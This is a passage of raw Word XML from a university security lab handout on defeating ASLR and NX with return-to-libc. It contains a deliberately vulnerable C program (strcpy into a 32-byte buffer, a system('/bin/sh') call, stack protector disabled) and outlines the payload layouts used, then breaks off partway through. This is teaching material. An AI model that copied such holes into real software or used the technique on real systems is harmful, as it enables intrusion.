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2DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_trhqxlsc8vth" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:t>Notes from Exploring ASLR &amp; NX Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_2517fcg658x7" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r>
        <w:t>Instructions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Make a copy of this document, rename it to “exploring-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aslr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-mitigation-notes” and move it to your CSE 523 Google Docs collection. If at any point in this exercise you feel stuck, raise your hand and get some guidance. When you reach each GATE below, switch over to the Tracking Progress document and update your position. Try to be efficient with your time.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:bookmarkStart w:id="2" w:name="_exuzkoq2m44m" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t>Today we will explore a technique that exploits a stack buffer overflow vulnerability when both address space layout randomization (ASLR) and no-stack-execute (NX) are enabled. Keep detailed notes below (place your comments in between the provided horizontal lines); you will be referring to these in the future to do your work.</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rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>We will be working in your CSE 523 Ubuntu VM, so start that now and open a terminal window.</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rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>GATE 1</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Make a folder called “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aslr_nx_mitigation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">” and enter the new directory. Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nano</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> or the text editor of your choice, create a file ans_check5.c and fill it with the following:</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stdio.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt;</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stdlib.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt;</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string.h</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt;</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check_answer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(char *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>) {</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ans_flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0;</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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ans_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>[32]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>;</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printf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>ans_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> is at address %p\n", &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>ans_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>);</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strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ans_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ans</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>);</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strcmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ans_buf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>, "forty-two") == 0)</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ans_flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 1;</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return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ans_flag</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>;</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main(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>argc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>, char *</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[]) {</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argc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt; 2) {</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 xml:space="preserve">"Usage: %s &lt;answer&gt;\n", </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[0]);</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exit(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>0);</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check_answer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>argv</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>[1])) {</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"Right answer!\n");</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 else {</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"Wrong answer!\n");</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
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>"/bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
        </w:rPr>
        <w:t>");</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rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>You must re-compile the C file with the following options:</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gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -m32 -g -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>fno</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>-stack-protector ans_check5.c -o ans_check5</w:t>
      </w:r>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spacing w:line="331" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Now, ensure that ASLR is turned on. Remember that if ASLR is turned on, the following command will return the value 2.</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spacing w:line="331" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cat</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> /proc/sys/kernel/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>randomize_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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spacing w:line="331" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>If you see some other value such as 0, you should enable ASLR with the following:</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spacing w:line="331" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>echo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> tee /proc/sys/kernel/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>randomize_va_space</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t xml:space="preserve">Execute </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>ans_check5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> on the command line several times, and include your transcript below. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="7D6B9FEF">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1FB9" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1FB9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4929229"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="1" name="Picture 1" descr="C:\Users\Po Adrich\Desktop\CSE523\18\QQ截图2019042115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o Adrich\Desktop\CSE523\18\QQ截图20190421155417.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rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="6811E11E">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>GATE 2</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In a past exercise, we used the return-to-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> technique to direct the flow of execution to a sequence of instructions that opened a shell. The primary benefit of this technique is that it removes the need to execute shellcode on the stack; instead, it leverages code already present in the binary.</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Our payload had the following structure (where &amp; is the address-of operator).</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PADDING | &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>) | &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exit_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> | &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cmd_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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 xml:space="preserve">The first two values are addresses of code that are found at stable, non-randomized locations, even when ASLR is enabled. Furthermore, the address of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>needs to be positioned within the payload so that it overwrites the return address on the stack.</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lastRenderedPageBreak/>
        <w:t>The third and final value is the address of a properly terminated string containing the command line that we wish to execute. In our examples, we use “/bin/bash”. In our previous exercise, we used the environment variable SHELL, which contains our desired string, but we needed to disable ASLR to ensure that the SHELL variable (which is placed on the stack as the program is first loaded, and is thus at a random location with ASLR enabled) would always appear at the same address. With ASLR enabled, we need another way.</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As discussed in class, we can use the return-to-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> method to construct our desired string at an address of our choosing. </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In particular, we can construct a build-string payload with the following organization.</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str_loc_1 | src_byte_addr_1</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str_loc_2 | src_byte_addr_2</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w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>str_loc_n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>src_byte_addr_n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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Where</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
